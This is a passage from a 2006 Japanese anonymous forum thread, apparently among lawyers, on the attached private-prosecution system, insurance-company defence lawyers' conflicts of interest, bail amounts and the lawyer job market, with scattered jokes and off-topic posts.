非弁乙 うざい


330 :無責任な名無しさん:2006/06/26(月) 12:38:01 ID:I/LYvhG0
付帯私訴制度というのは大陸法の制度で日本でも戦前の旧刑訴法にはあった。
戦後新刑訴法でなくなったが、被害者救済の観点からこの制度の復活がクローズ
アップされてきました。この制度では被害者の側も記録を閲覧したり法廷に出席し
て被告人を尋問したりすることができます。被害者の側が別に民事訴訟を起こす
必要がなくなるので被害者救済に繋がります。民事刑事の両方を一挙に解決でき
るので裁判所にも訴訟経済に資するというメリットがあります。

問題点としては被害者が法廷に立って被告人を尋問したり、賠償金を上積みするた
めに被告人を攻撃する、逆に被告人の側からみると刑を軽くするために本来の相場
より金銭の上積みをしなければならないといったことで被告人の防御権が侵害される
おそれがある、被害者感情に訴訟が影響されて被告人に対する刑罰、賠償が過酷
になりかねないといった点が想定されます。

被害者保護、厳罰化といった最近の訴訟の潮流に沿った議論だといえるでしょう。
例の山口母子殺害事件の被害者の本村氏や山一での紛争処理中に妻を殺害された
元一弁会長の岡村弁護士などがこの制度の導入を訴えていました。今回の導入は
この被害者の要求に応えたものといえます。




331 :無責任な名無しさん:2006/06/26(月) 12:55:05 ID:w+JM4KiV
情状中心の今の刑事裁判での附帯私訴は疑問だね。
只でさえ、「反省してます、被害弁償をします・しました」が重要とされるのに、
過失相殺や被害者側の落ち度なんてまったく言えなくなる。
ホントニ、東大阪大生(「ひがしおおさかだいせい」と読みます)
リンチ事件はどうなるんかな。


332 :無責任な名無しさん:2006/06/26(月) 13:05:24 ID:hBM0/QDu
保釈の成功率、どのくらいですか皆さん

333 :無責任な名無しさん:2006/06/26(月) 13:21:51 ID:FHf3W3pR
 付帯私訴の場合、弁護人が、私訴の代理人をかねるのだろうか?私選ならともかく、国選でそれは・・・。
逆に本人訴訟にするとしてしても、結局は弁護人にアドバイスを求められることになりそうだ・・・。

334 :無責任な名無しさん:2006/06/26(月) 13:25:58 ID:iGRHqNx/
で、附帯私訴の申立代理人はどこに座るんだい。検事の横か?


335 :無責任な名無しさん:2006/06/26(月) 13:31:03 ID:gJjx9REn
>>333
ますます国選の単価が安くなる・・・・・

336 :無責任な名無しさん:2006/06/26(月) 13:49:50 ID:6A+CXbFB
業過事件で、国選弁護人が罪を軽くしてもらうために、ほいほい
高額な和解したら、保険会社はそれに拘束されるのか。

あるいは保険会社の顧問が日本中の刑事事件に派遣されるように
なるのか。

実は、附帯私訴の対象になる人よりならない人の方が気になる。
出資法違反事件なんか、何百人も被害者がいるのに、起訴されるの
は、その中の一部だけだからね。

337 :無責任な名無しさん:2006/06/26(月) 14:08:29 ID:FHf3W3pR
 損保弁護士なのだが、保険会社の関与しない被告人の和解には保険会社は拘束されない。
判決でも、不当な自白、必要な抗弁を提出しない等の場合には、やはり拘束されないと思う(協力義務違反か?少なくとも、拘束されない約款改訂をするだろう。)。
 損保弁護士が、刑事事件に派遣されると、被告人の利益という立場と、損保会社の利益という立場が相容れない場合があるので引き受け難いと思う(これは現状でも同じ。)。
保険会社が保険金を支払わないことによって困るのは被害者なので、付帯私訴で和解なり判決が出た後、被害者が、債権者代位により保険会社に直接支払い請求を行い、その中で、保険金支払い義務の範囲、
すなわち法律上正当な賠償額がいくらかが争われるのではなかろうか。

338 :無責任な名無しさん:2006/06/26(月) 14:23:26 ID:04g4ZFOh
交通事故の損害賠償であれば、被害者の過失を主張するのは当然なんだけど、
過失主張しただけで「反省してない」ときたら参ってしまう。
それに、保険会社が過失相殺主張しろと言ったら、一応そう対応しなければなら
ないのに、保険会社とは別に自分で払うことができるだろう?などと言うようなのが
裁判官だと困る。
民事の裁判官だと、交通事故の損害賠償は基本的に保険会社が行うと分かって
いるけど、刑事の裁判官で、そこら辺をきっちり分かってくれる人はどれだけいるか。
そもそも、「賠償額が折り合いが付かない」という場合、被害者側の請求が高すぎる
ということだって往々にしてある。
なのに、反省していない、誠意がないって切り捨ててしまうようだと困るんだよね。
せめて、刑を定める裁判官と、賠償額を定める裁判官は別にしてもらいたいよ。

339 :無責任な名無しさん:2006/06/26(月) 14:32:27 ID:PYvfG0QJ
数年前から検察官(ときには裁判官も)は、被告人質問で「保険金で示談しました。」
と答えた被告人に対して、「身銭切って被害者に慰謝料を支払う気は無いか?」と質問する
ことが多くなった気がする。検察官や刑事の裁判官には、「保険金だけでは自分の懐が
傷んでないから、誠意を見せたことにはならない。」という意識があるような気がする。


340 :無責任な名無しさん:2006/06/26(月) 14:37:05 ID:6A+CXbFB
>>337
>損保弁護士が、刑事事件に派遣されると、被告人の利益という立場と、
>損保会社の利益という立場が相容れない場合があるので引き受け難
>いと思う(これは現状でも同じ。)。

これは現状の民事であっても同じはずなんだけどね。

341 :無責任な名無しさん:2006/06/26(月) 14:50:07 ID:04g4ZFOh
>339
加害者が身銭を切って支払いをすることを、保険会社はものすごく嫌がる
んだけどね。保険会社の信用を落とすと思っているのか知らないけど。
とにかく家族が金を出せ出せとうるさい刑事裁判官・検察官もいるしね。
基本的には仕方ないと思っているけど、以前、生活保護で生きている親が
情状証人で出たときに、どうして支払いをしないのかと散々怒られたときは
本当に困ってしまった。
生活保護なのでと言っても通じないし。(止められてしまうことを知らない)
消費者金融からでも、クレジット組んででも返しなさいよみたいなことを言った
人までいるし、もう家族はどこまでやらなければならないんだと思うときもある。

342 :337:2006/06/26(月) 14:51:13 ID:FHf3W3pR
>340
 そのとおり。民事でも、委任状は契約者本人から貰っていますので。
 たまに、もっと払ってあげてよという契約者がおられますけど、保険会社からは出ませんがご自身で負担されますかと水を向けると、多くは黙ってしまう。
 法律上の賠償義務額は保険金がでる建前なのだけれど、示談段階ではそうでもないし、裁判所基準が本当に正当かと言われると、人間に値段はつけられないのですけどね。

343 :341:2006/06/26(月) 14:53:55 ID:04g4ZFOh
被害者が大変なのは分かっているし、家族まで憎い、家族だったら本人に
代わって責任を取れという話になるのは分かるけれども、既に40歳くらいに
なっている被告人の犯罪の責任を、親だからと責め立てられるのがなぁ。
まあ、情状証人に出てもらわなければいいだけなのかもしれないけど・・。

本当に懐を痛めるべきは被告人本人なんだから、国が本人を拘束して働か
せて被害者に賃金から支払わせるようにすればいいのにさ。
(相談で、こういう制度はないのかと時々質問がある)

344 :無責任な名無しさん:2006/06/26(月) 15:01:26 ID:6A+CXbFB
>>342
委任状は契約者本人から貰って、保険会社のために弁護活動しているのが気に入らない。

345 :337:2006/06/26(月) 15:12:29 ID:FHf3W3pR
 依頼の趣旨の大半が、保険の出る範囲でやってくれということなので・・・。
でも、本当に被害者は置き去りですよね。法律上の賠償金額とは別に、被害者に一時金を支給する特約でも出来れば、私は追加保険料を支払ってでも入るよ。
物損では、超過修理費担保特約が類似の機能を果たしているけどね。

346 :無責任な名無しさん:2006/06/26(月) 15:17:05 ID:4g/7Cqif
そんなに被害者保護が大事なら、いっその事、債務奴隷の制度を復活させたらどうか?

347 :無責任な名無しさん:2006/06/26(月) 15:29:12 ID:MGwISvAE
>>346
罰金は事実上債務奴隷になるんだから民事も検討の余地あるかなw

348 :無責任な名無しさん:2006/06/26(月) 15:52:22 ID:gJjx9REn
裁判官裁判ならば,反省の情を棚上げして,被害者の過失を主張できる。赤本を弁号証で請求したこともあり。
相当な賠償額を提示して被害者側が蹴ってきた場合は,その旨の報告書でそれなりに情状立証できた。

しかし,裁判員裁判となると,反省の情を切り売りして,被害者の過失を主張することになり躊躇するだろうな・・・。

349 :無責任な名無しさん:2006/06/26(月) 16:07:28 ID:K/WEl4dH
>>348
業過致傷に裁判員は関係ないような

350 :無責任な名無しさん :2006/06/26(月) 17:13:48 ID:oilALriP
結婚するなら処女としてえな
無理か・・・

351 :無責任な名無しさん:2006/06/26(月) 17:46:29 ID:+LObDmOY
弁護士なら普通、処女と結婚してるだろ

352 :無責任な名無しさん:2006/06/26(月) 18:03:32 ID:MGwISvAE
>>351
おいおい,ネタにしても恥ずかしすぎるよ

353 :無責任な名無しさん:2006/06/26(月) 18:44:31 ID:0RudPzRx
このスレあぼーんされてますが、なんか問題あること書いてあるんですかね。

http://school5.2ch.net/test/read.cgi/shikaku/1150181718/l50

354 :無責任な名無しさん:2006/06/26(月) 19:05:09 ID:hlmGXu1Z
原口は操り人形。だから人を使って、永田にメール問題を起こさせた。
ちなみに大阪では原口が「武部氏周辺にお金が流れているのは間違いない。」
とTVで断言していたので、皆、武部氏がお金を貰っていると思っている。
宮崎氏にだいぶ強く注意されたときに、間違っていたら、
議員をやめる覚悟みたいでしたが、やめていないところをみると、
武部氏にお金が流れているのでしょうか。
はっきりさせてください。
間違っていたら、当然原口は議員辞職してください。
元遠隔監視も「武部さんのところにお金が入っている。」と皆の前で報告していた。
ちなみに元遠隔はあほの人。

355 :無責任な名無しさん:2006/06/26(月) 22:01:48 ID:xBwMyxA0
 そもそもだよ,「株式会社(営利法人)」が損保やっているからお
かしいのだね。
 交通事故の加害者本人は,被害者さんに出来るだけ高額な償いをしたい
と思っているわけだね。
 「無制限保険」で被害者さんに7000万円とか1億円とか大盤振る舞いして
くれると思っている訳なのよ,

356 :無責任な名無しさん:2006/06/26(月) 22:05:05 ID:xBwMyxA0
 インサイダー村上さんの保釈保証金(5億円)なのだが,あれは,日銀発行の小切
手で払ったのか? 預手でも良いのか?
 わしゃ,保釈金で払った最高額は300万円だった。
 庶民階級の被告人さんは,150万円くらいだよね>同業者

357 :無責任な名無しさん:2006/06/26(月) 22:07:35 ID:xBwMyxA0
 ファンド加入者が保釈保証金(厳密には弁護士に預けたお金の返還請求権)差し押さえ
たりして(ワ)

358 :無責任な名無しさん:2006/06/26(月) 22:10:37 ID:YRX4gyir
弁護人は相殺で対抗だな

359 :無責任な名無しさん:2006/06/26(月) 22:10:54 ID:xBwMyxA0
 何の根回しもなく修習委員会に入ってしまい,うざったい修習生が最高4ヶ月事務所に滞留することに
なる。修習委員会に入ると10年くらい足抜け出来なくなるらしい。普通,単位会の委員会配属って執行
部から打診があるだろう。
 そのうえロースクールのステューデントの面倒も見なければいけない。鬱出汁脳。

360 :無責任な名無しさん:2006/06/26(月) 22:13:11 ID:jiX+Ais9
裁判官が出ないはずの保釈を検事の強硬な反対押し切って出した(^▽^ケケケ
ところが被害総額と同じ2000万円が保釈保証金 ( ゚д゚)ポカーン
被告人は自己破産申請中だったし (*´・д・)ウーン(・д・`*)
結局,シャバの空気を吸わず刑務所へ逝った _| ̄|○

361 :無責任な名無しさん:2006/06/26(月) 22:17:54 ID:xBwMyxA0
>>360
 保釈保証金に関しては,準抗告・抗告が出来なかったかなぁ?
 仮差の保証金は,抗告が効いたと思う。

362 :無責任な名無しさん:2006/06/26(月) 22:24:12 ID:xBwMyxA0
>>358
 チョウカイセイキューーーー。

363 :無責任な名無しさん:2006/06/26(月) 22:24:52 ID:jiX+Ais9
>>361
オンナの所にそれなりに隠匿資金があるので保釈をといってたが
保釈許可決定が出て接見に行ったら……50万円だった
これでは相場の金額でもだめぽ _| ̄|○

364 :無責任な名無しさん:2006/06/26(月) 22:27:01 ID:xBwMyxA0
>>358
 トリタテソショーーーー


365 :無責任な名無しさん:2006/06/26(月) 22:27:36 ID:APPDY8jA
>>360
保釈金に関して、裁判所と事前の折衝なかったの?
地方では、保釈の申請のときにこちらが提示した額より下の場合ならともかく、
上の場合は、裁判所から「今日中に○○万円用意できます?」とか「○○万円出せますか?」
とか決定出す前に問い合わせてくるけど。

366 :無責任な名無しさん:2006/06/26(月) 22:34:31 ID:xBwMyxA0
 それなりに実績のある法人らしい。T先生(もと東京方面弁護士会副会長)も推薦だyo。

http://www.hosyaku.gr.jp/

367 :無責任な名無しさん:2006/06/26(月) 22:38:48 ID:jiX+Ais9
>>365
普通は保釈がでないホスト詐欺の親分で否認だが証拠全部同意
証拠全部同意したんだから無理でも保釈だしてホスイとしか言えなかった
被告人も↑のとおり隠匿資金がけっこうあるような口ぶりだった
裁判長は,ニヤリと笑って,「じゃあ出しましょう,では。」で面接終わり
250万円くらいと踏んでたし,被告人もそれぐらい持ってそうな口ぶりだった

だけど自己資金と称するのが50万とはダメポ
オンナに電話したら,逆に500万貸してるから返せ!だって_| ̄|○
こっちは国選だからなー 逆に私選でなくてよかったかも
検事も「どうせ払えないでしょうから抗告しません」と笑ってた

368 :無責任な名無しさん:2006/06/26(月) 22:43:29 ID:JQDLaFls

  ■□■【いつもの絡み粘着軍団警報発令中】■□■


…お客さん《カモ》、ネギ背負って早く来ないかなぁあ…  ワクワクドキドキー…  
―――――――――――――〇―――――――――――――――
                  o
:::::::::::::::::______________:::::::::::::::::::::::::::::::::::
:::::::::::::::/ / / / / / / / / / / /ヽ:::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::/ / / / / / / / / / / /= 、ヽ:::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::/__./__/ / / / / / / / / /__、ヽ:::::::::::::゚:::::::::::::::::::::::::::::::::::::::
::::::::::::::::|やさ法l ノ ̄ ̄|ノ ̄ ̄|ノ ̄ ̄|| ||  .|::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::__..|歓迎 !!|/__ノ_____ノ_____ノ| ||   |::::::::::::::::::::::::::::::゚:::::::::::::::::::::::::::
  |  | └ー┘  グツグツ   ∧_∧ |  ||   |:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|三|  \     | ||=┻=   (・∀・ )  ||   | ___::::::::::::::::::::::::::::::::::::
|三|   \ ┌┴┸―――┴――┴┬┴┐/   /:::::::::゚::::::::::::::::::::::::
|三|      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ○ / ::::::::::::::::::::::::::::::::
|三|  【悩める相談者よ、迷わず来たれ!!】  /:::::::::::::::::::::::::::::
  \( ID:GL+Mwh7f) 第179絡み粘着丸 /:::::::::::::::::::
     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄::::::::::::::
:::::::::::::::::::::::::::::゚:::::::::::::::::::::::::::::::::::::::::::::::::::

吉と出るか凶と出るかは時の運!  相談者は、自己責任で行動してください

やさしい法律相談part179 ※『やさしい』は、『優しい』では無く、『易しい』ですから念のため!!
http://school5.2ch.net/test/read.cgi/shikaku/1150821903/


369 :無責任な名無しさん:2006/06/26(月) 22:51:12 ID:xBwMyxA0
>>367
 その被告人のナオンは情状証人になるのかい?
 弁護人との打ち合わせで台本を作って,本番の時に裏切る香具姉もいるからな。


370 :無責任な名無しさん:2006/06/27(火) 00:12:22 ID:Gnxx3pSu
>>369
「金返したら出てもいい」・・で情状証人にならんかった

371 :無責任な名無しさん:2006/06/27(火) 00:18:46 ID:KyVG6Z80
>>366
こういうHPに本名出す神経疑うよ。

150万円2か月立替で手数料6万円だと。
1,500,000*0.15*2/12=37,500

貸金業の登録もない。

372 :無責任な名無しさん:2006/06/27(火) 00:28:05 ID:Gnxx3pSu
>>371
月利3%前後ですか?
年利36%前後〜ぁゃιぃ
立替って融資と同じですよねーw

交渉請負人といい
非弁活動が爆裂中!

373 :無責任な名無しさん:2006/06/27(火) 00:30:37 ID:rOSBEdIL
>>371
だから貸金ではないと(ry

374 :無責任な名無しさん:2006/06/27(火) 01:02:54 ID:8fKxoDFe
 よく考えてみると消費者金融さんが保釈保証金を貸し出した方がずっと良い。
 担保(質権)は弁護士さんに対する預かり金返還請求権の訳で,まず,とりっぱぐれ
はなく,手堅い商売だね。
 誰か,サラ金関係の顧問さん(よし乃さんとか)が「儲かりまっせ」と提案してみたらどうよ。

375 :無責任な名無しさん:2006/06/27(火) 08:42:33 ID:GwYQVG3W
>>373
どっからどう見ても貸金です。ありがとうございました。

376 :無責任な名無しさん:2006/06/27(火) 08:52:24 ID:9Dt7EATq
特許出願中らしいね

377 :無責任な名無しさん:2006/06/27(火) 09:05:33 ID:FJiyIVv+
いわゆるビジネスモデル特許というやつだね

378 :無責任な名無しさん:2006/06/27(火) 09:42:24 ID:1+8BZTKw
今月号の大弁の会報の会長インタビューでは、イソ弁の初任給を年400万円乃至500万円
に抑える価格カルテルを勧めているようにも読めるような記述があるが・・・
3000人時代は厳しいね

379 :無責任な名無しさん:2006/06/27(火) 13:40:44 ID:+Aa0ijJ9
しがらみからイソ弁を無理に取ることになって経営を悪化させるボスも結構出てきそう。

380 :無責任な名無しさん:2006/06/27(火) 14:03:10 ID:1+8BZTKw
そうだよな。結局役員がどこかに無理押し込むしかないもんなぁ。

381 :無責任な名無しさん:2006/06/27(火) 14:13:45 ID:+uYVyxln
クレサラバブル終焉、ADR始動で、現在の人数でも飽和するのにな。

382 :無責任な名無しさん:2006/06/27(火) 15:12:44 ID:+Aa0ijJ9
安いイソ弁にシフトして現在のイソ弁が首を切られるケースも結構多くなるだろう。

383 :無責任な名無しさん:2006/06/27(火) 15:17:30 ID:eO6Weopf
>>378
400万円なら事務員並
事務員がわりにイソ弁雇うか

384 :無責任な名無しさん:2006/06/27(火) 15:23:54 ID:8apfDaWv
イソ弁とは?

385 :無責任な名無しさん:2006/06/27(火) 15:40:07 ID:JE3VmntN
イソギンチャク弁護士の略です。

386 :無責任な名無しさん:2006/06/27(火) 17:22:51 ID:8u2kKKK3
ISO認証取得弁護士の略

387 :無責任な名無しさん:2006/06/27(火) 17:32:30 ID:TWJg1fvs
ななに

388 :無責任な名無しさん:2006/06/27(火) 19:03:03 ID:19otTMn9
説明しよう。
「イソ弁」とは、町を歩いているときに、美しい女性を見かけて、
よそ見をして歩いていたために、電信柱に鼻をぶつけたことに
よって、鼻血を出し、慌ててティッシュを探したが、持っていない
ことに気づき、近くでティッシュを配っていた某金融会社の人に
ティッシュをもらおうと走り出したものの、慌てていたために
通行人にぶつかってしまい、「すみません。急いでいたもので。」
と謝る急ぐ弁護士のことである。

389 :無責任な名無しさん:2006/06/27(火) 19:30:22 ID:/lL39fs9
先生方教えてください。

主人の裁判で証人として行くのですが、どんな服装で行くのが
裁判官の心証としてはベストでしょうか。

やはりスーツ?
スーツはリクルートスーツ??

はじめての裁判で何も分かりません。
先生助けてー。

390 :無責任な名無しさん:2006/06/27(火) 19:40:18 ID:JrQjpOM5
>>389
民事か刑事か知らないが
スーツがあるのならスーツでおk。
スーツじゃなくてもフツーの格好ならおk。
ちゃらちゃらした格好で冒険するのは無意味です。
裁判官も人間。見た目の印象は大事。

391 :無責任な名無しさん:2006/06/27(火) 20:00:16 ID:VSlMDxZW
>>388
富山敬さん乙

392 :無責任な名無しさん:2006/06/27(火) 21:31:31 ID:/lL39fs9
>>390
レスありがとうございます。
刑事事件です。
スーツ、ももも持ってないんです。
この際だから買ったほうがいいですよね。新調することにします。
助かりました、ありがとうございました。


393 :無責任な名無しさん:2006/06/27(火) 21:33:53 ID:Gnxx3pSu
ブレザーもいいですよ

394 :無責任な名無しさん:2006/06/27(火) 22:13:26 ID:FJiyIVv+
セーラー服でもOK

395 :無責任な名無しさん:2006/06/27(火) 22:22:17 ID:y5zTVvjl
スク水ry

396 :無責任な名無しさん:2006/06/27(火) 23:56:16 ID:Gnxx3pSu
そこまで!

397 :無責任な名無しさん:2006/06/27(火) 23:56:38 ID:YD0wDUBd
パワードスーツは金属探知器で引っかかるから駄目。

398 :無責任な名無しさん:2006/06/27(火) 23:58:42 ID:Gnxx3pSu
ワイヤー入り下着も東京地裁の金属探知機にひっかかるお

399 :無責任な名無しさん:2006/06/28(水) 00:11:16 ID:pY55je/f
弁護士にはどんな種類の弁護士がいるのか網羅的体系的に整理してください。

400 :無責任な名無しさん:2006/06/28(水) 00:22:17 ID:juHdRroS
閑人 遊び人 仕事人 逸般人 一般人 苦労人 過労人

401 :無責任な名無しさん:2006/06/28(水) 00:30:41 ID:pY55je/f
そうじゃなくて

402 :無責任な名無しさん:2006/06/28(水) 00:37:36 ID:juHdRroS
ほかは「網羅的体系的」分類は不可能
400基準はどれかに当てはまり全弁護士を網羅できる唯一の分類w

403 :無責任な名無しさん:2006/06/28(水) 01:22:04 ID:pY55je/f
素人乙。

404 :無責任な名無しさん:2006/06/28(水) 01:27:51 ID:juHdRroS
age逝ってよし

405 :無責任な名無しさん:2006/06/28(水) 16:58:24 ID:3X6cRoeg
「スタッフ弁護士=即戦力」に応募しようじゃないかhttp://www.iza.ne.jp/news/newsarticle/event/7199/

406 :無責任な名無しさん:2006/06/28(水) 16:59:59 ID:rnwDc4ty
逸般人って何?

407 :無責任な名無しさん:2006/06/28(水) 17:23:09 ID:YF3s/KmI
>>405
>担当した桜井光政弁護士は「東京は会社法務に強い弁護士は多いが、実際の訴訟を十分戦える弁護士が少ない。地方で実務経験を多く積んだスタッフ弁護士は即戦力になりうる」と話す。

だったら地方でイソ弁した方がマシ

408 :無責任な名無しさん:2006/06/28(水) 17:34:51 ID:8ox9oFQK
なんか詐欺商法みたいだな。

409 :無責任な名無しさん:2006/06/28(水) 18:03:24 ID:6qDoPywC
俺は地方の弁護士だが、東京に行けば「即戦力」として、企業や行政から
顧問の依頼が殺到するのかぁ−。行ってみようかな。

410 :無責任な名無しさん:2006/06/28(水) 18:11:14 ID:MHrIo4Dd
俺は田舎弁護士で、今、コンビニの勧誘に説明義務違反があったという
元店主の側の訴訟をやってるんだけど、それに近いものを感じるな。

411 :無責任な名無しさん :2006/06/28(水) 18:57:30 ID:VOGDX1xU
弁護士の妻は優しい女に限る
ちょっと物足りない位の
家で位ゆっくりしたいよ

412 :無責任な名無しさん:2006/06/28(水) 19:04:14 ID:6GAY0Xbs
企業の顧問になれなかったら桜井弁護士が責任取ってくれるだろうよ。

413 :無責任な名無しさん:2006/06/28(水) 19:15:53 ID:zW4rzLxi
なんか、このスレ、最近だらけてきたね。
なんでらろ?

414 :無責任な名無しさん:2006/06/28(水) 19:19:31 ID:qhcG7XF6
>>327
>>336
俺は損保弁護士。
その立場から言わせてもらうと、加害者が払いたいという場合は、示談したり、損害賠償をいくら払うかはご自由ですが、保険でカバーできるのは法的な損害額に限定されますから気を付けてくださいね、と忠告して終わりだと思う。
保険会社は拘束されない。

415 :無責任な名無しさん:2006/06/28(水) 19:38:03 ID:qhcG7XF6
櫻井センセーもなあ・・・・。
どうして、上から物を見る言い方なんだろうね。

即戦力といっても全くピントがずれているよ。
客が来ないなら全く意味がない。
それと一般民事の事務所も沢山あるのにね。



416 :無責任な名無しさん:2006/06/28(水) 20:22:33 ID:QKUJ9XpG
弁護士なんて殺されてもざまーみろとしか思わない

417 :無責任な名無しさん:2006/06/28(水) 20:23:32 ID:zW4rzLxi
>>414
加害者の委任状を手元に置いて、それでいいのかという問題が根本にあるんだが。
平成弁護士には、こうは言っても、所詮は、通じないことだろね。

誰のための弁護士か、利害相反という問題は、司研や弁護士会の研修でやっている筈だが。
私にとっても、居眠りの時間でもあったが。



418 :無責任な名無しさん:2006/06/28(水) 20:27:21 ID:zW4rzLxi
付言
損保の弁護士なんて、一昔前には、恥ずかしくて弁護士が口にはできない言葉だったが、
(アイツは損保をやっているらしいという、陰口はあった)
現在は、弁護士として自慢するべきことがらになって居るんですか。

昔弁護士ヨリ。

419 :無責任な名無しさん:2006/06/28(水) 20:39:31 ID:pSyBYKP0
>>417
法曹倫理的にも無問題。
損害保険で填補されない部分があることを指摘しただけ。
当然のことながら保険契約でカバーできない部分は、損保会社は支払い義務がない。

例えばひき逃げや被害者への暴行・暴言がある場合の慰謝料の加重分は加害者負担。

420 :無責任な名無しさん:2006/06/28(水) 20:54:12 ID:qhcG7XF6
>>417
昭和弁護士さん、もう少し勉強してください。

421 :無責任な名無しさん:2006/06/28(水) 21:08:07 ID:+Mdprp2o
ああ、フランチャイズか。
あそこ結構好きなんだけどな。
美味いし。

422 :無責任な名無しさん:2006/06/28(水) 22:13:40 ID:8VJvhZKl
>>418
別に自慢してるわけではないだろう。有名な弁護士がサラ金の顧問になってるのが
今の時代だよ。サラ金の顧問なんか引き受けるのはそれこそ損保の顧問になるのと
は比べものにならないぐらい恥ずかしい事だと俺は思ってたが、そうは考えない弁護士
も最近は多いのだろう。弁護士大増員時代になると筋の悪い業者の事件を引き受けたり
顧問になったりする奴はどんどん増えるのだろう。

423 :無責任な名無しさん:2006/06/28(水) 23:59:57 ID:9JAgNrom
信販会社とか証券会社(先物系)は、どうよ?

424 :4?期:2006/06/29(木) 00:05:06 ID:cd/pc5Ym
法曹の良心を売り渡せば泡銭がもうかるのが極少数の弁護士。
やり過ぎると証拠隠滅で逮捕(許事件)や懲戒(最近の某)くらうけどw。

425 :無責任な名無しさん:2006/06/29(木) 04:40:58 ID:V+paLj9w

     ■□■【いつもの絡み罵倒軍団警報発令中】■□■

…お客さん《カモ》、ネギ背負って早く来ないかなぁあ…  ワクワクドキドキー…  
―――――――――――――〇―――――――――――――――
                  o
:::::::::::::::::______________:::::::::::::::::::::::::::::::::::
:::::::::::::::/ / / / / / / / / / / /ヽ:::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::/ / / / / / / / / / / /= 、ヽ:::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::/__./__/ / / / / / / / / /__、ヽ:::::::::::::゚:::::::::::::::::::::::::::::::::::::::
::::::::::::::::|やさ法l ノ ̄ ̄|ノ ̄ ̄|ノ ̄ ̄|| ||  .|::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::__..|歓迎 !!|/__ノ_____ノ_____ノ| ||   |::::::::::::::::::::::::::::::゚:::::::::::::::::::::::::::
  |  | └ー┘  グツグツ   ∧_∧ |  ||   |:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|三|  \     | ||=┻=   (・∀・ )  ||   | ___::::::::::::::::::::::::::::::::::::
|三|   \ ┌┴┸―――┴――┴┬┴┐/   /:::::::::゚::::::::::::::::::::::::
|三|      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ○ / ::::::::::::::::::::::::::::::::
|三|  【悩める相談者よ、迷わず来たれ!!】  /:::::::::::::::::::::::::::::
  \(二二二二二二) 第180絡み粘着丸 /:::::::::::::::::::
     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄::::::::::::::
:::::::::::::::::::::::::::::゚:::::::::::::::::::::::::::::::::::::::::::::::::::

やさしい法律相談part180
http://school5.2ch.net/test/read.cgi/shikaku/1151411752/
吉と出るか凶と出るかは時の運!  相談者は、自己責任で行動してください


426 :無責任な名無しさん:2006/06/29(木) 09:51:52 ID:x/o3K87i
法曹の良心なんてのは、少数の優秀な人間によるギルド社会だから成り立ちえたもの。
ミソもクソも弁護士になれる時代にはあり得ないだろう。

427 :無責任な名無しさん:2006/06/29(木) 10:22:49 ID:SDs+7q26
↑と同じくノブリスオブリージュなんつー時代じゃないと
思われる。
だからボランティアも明確に拒否するべきだ。
国選報酬引き下げ?どうぞご自由に。
でも会として会員には国選受任を当面見合わせるよう促しときます。

428 :無責任な名無しさん:2006/06/29(木) 10:48:27 ID:wqvkUW35
>>426-427に禿同。
おいしい仕事があって経済的に問題がなかったからこそ
不経済な仕事も、やっかいな仕事もできた。
もう、やる必要ないな。

429 :無責任な名無しさん:2006/06/29(木) 11:32:54 ID:SFLrcznk
心配しなくてもロー卒がやりますよ。
ロー卒が入るまでは今年の秋に就職できなかった人に優先的に仕事を回してあげればいいだけのこと。

430 :無責任な名無しさん:2006/06/29(木) 11:58:45 ID:HY3hj+5w
>>427
弁護士が高貴な身分だと勘違いしてる人はけーんw

431 :無責任な名無しさん:2006/06/29(木) 12:04:27 ID:lj6gFBIE
>>418
今やクレサラ会社側弁護士というのがあって,そっちの方が恥ずかしいので,
被害者に適当なことを言って支払うべき保険金をごまかしてその一部をもらっている
という損保弁護士に対する非難は最近余り聞かない

432 :無責任な名無しさん:2006/06/29(木) 12:05:20 ID:lj6gFBIE
>>427
そもそもノーブルじゃなくなってますね
私たち

433 :無責任な名無しさん:2006/06/29(木) 12:07:19 ID:A4cH2ArX
>>424
意図は不明だけど、文脈からすると
消費者金融の顧問=良心を売り渡した
ですか?

彼らの代理人は必要ですよ。

損保弁護士となると、もっと必要でしょう。
コツンとぶつけられて首が痛いというヤクザ相手に安い金でやり合うんだからたいしたもんだよ。
独立した手の時は何件か損保もやっていたけれど、事務所が安定してからは真っ先にやめたよ。

損保をやれるのはよほど精神的にタフか、ストレスに鈍いタイプかどちらか。

俺は普通の人だったからやれなかった。
もし俺が普通人じゃなかったらやっていただろうね。
単価は安いけれど、大量にやれば儲かるし。

434 :無責任な名無しさん:2006/06/29(木) 12:12:15 ID:A4cH2ArX
>>431
他の損保弁護士は知らないが、俺がやっていたときは任意基準、自賠基準を基礎として、こじれたり、訴訟になったときは赤本ベースだったけれど、ごまかして支払いをしないということはやったことがないな。
自賠では過小示談はきつく怒られるから、弁護士も保険会社の担当者もきちんとやっていると思うけどな。

非難されるのは、治療期間を短縮しようとしたり、やたらと素因減額や因果関係を争ったりするところなのではないかと思われ。
被害者側弁護士からすると「依頼者はこんなに苦しんでいるのに素因減額の主張をするなど、人の心がないのか!」と思うのだろう。



435 :無責任な名無しさん:2006/06/29(木) 12:18:43 ID:lj6gFBIE
>>434
自賠超えたらどうよ

ま,今は損保も合併で数が減って,簡単な事件は自分らで処理して,面倒なのだけ弁護士に振ってくるそうですな
経営は安定するかも知れないけどやっぱやりたくはないな

436 :無責任な名無しさん:2006/06/29(木) 13:49:19 ID:dl/Xd6ni
 相手方がおとなしいとつまらなく感じ、逆にうるさくてかつ過大請求をやっていると俄然燃えてくる漏れは、もう壊れてますか?
ちなみに、最近損保から来る示談案件は、相手方が契約者に保険とは別に払えと直接、何回も、しつこく要求している案件が多くなっています。

437 :無責任な名無しさん:2006/06/29(木) 14:01:27 ID:x/o3K87i
損保をやったことがないからよく分からんが、3000人時代になれば、そんな単純な
力仕事をやる人間はわんさかいるから、単価はかなり下落するのでは? 皆さん大丈夫?

